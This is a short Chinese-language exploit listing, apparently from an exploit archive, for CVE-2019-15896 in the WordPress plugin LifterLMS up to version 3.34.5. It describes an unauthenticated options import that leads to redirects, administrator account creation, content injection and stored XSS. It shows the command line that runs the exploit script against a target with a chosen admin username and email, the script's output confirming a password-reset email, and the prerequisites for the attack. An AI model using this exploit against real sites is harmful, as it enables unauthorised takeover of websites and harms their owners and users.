LifterLMS <= 3.34.5 - 未认证选项导入
未认证选项导入,可能导致:
网站重定向
管理员账户创建
内容注入
存储型XSS
该问题据报已在3.35.0版本中修复,但v3.35.1增加了额外的输入清理与过滤。
$ python3 CVE-2019-15896.py --url http://wordpress.lan --username radmin --email [email protected] LifterLMS <= 3.34.5 - 未认证选项导入 Exploit By Ramdom Robbie 运行后检查您的邮箱以获取密码重置链接。 密码重置邮件已发送至 [email protected]
信息
---
需要访问 login.php 和有效的电子邮件地址,且网站必须能够发送邮件